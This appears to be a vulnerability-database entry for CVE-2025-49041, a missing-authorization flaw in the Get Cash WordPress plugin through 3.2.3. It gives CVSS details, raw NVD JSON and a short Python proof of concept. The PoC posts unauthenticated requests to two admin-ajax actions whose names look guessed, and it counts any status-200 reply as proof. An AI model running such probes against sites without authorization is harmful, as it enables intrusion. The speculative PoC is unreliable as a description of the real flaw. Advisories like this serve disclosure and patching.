Security Vulnerability Report
中文
CVE-2025-49041 CVSS 6.5 MEDIUM

CVE-2025-49041

Published: 2025-12-18 08:15:50
Last Modified: 2026-04-27 20:16:08

Description

Missing Authorization vulnerability in The African Boss Get Cash get-cash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Get Cash: from n/a through <= 3.2.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Get Cash WordPress插件 <= 3.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = 'http://target-wordpress-site.com' # 未授权访问插件管理功能 endpoints = [ '/wp-admin/admin-ajax.php?action=get_cash_admin_action', '/wp-admin/admin-ajax.php?action=get_cash_config_update' ] for endpoint in endpoints: url = f'{target}{endpoint}' response = requests.post(url, data={'key': 'value'}) if response.status_code == 200: print(f'Vulnerable endpoint found: {endpoint}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49041", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:49.837", "lastModified": "2026-04-27T20:16:08.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in The African Boss Get Cash get-cash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Get Cash: from n/a through <= 3.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/get-cash/vulnerability/wordpress-get-cash-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}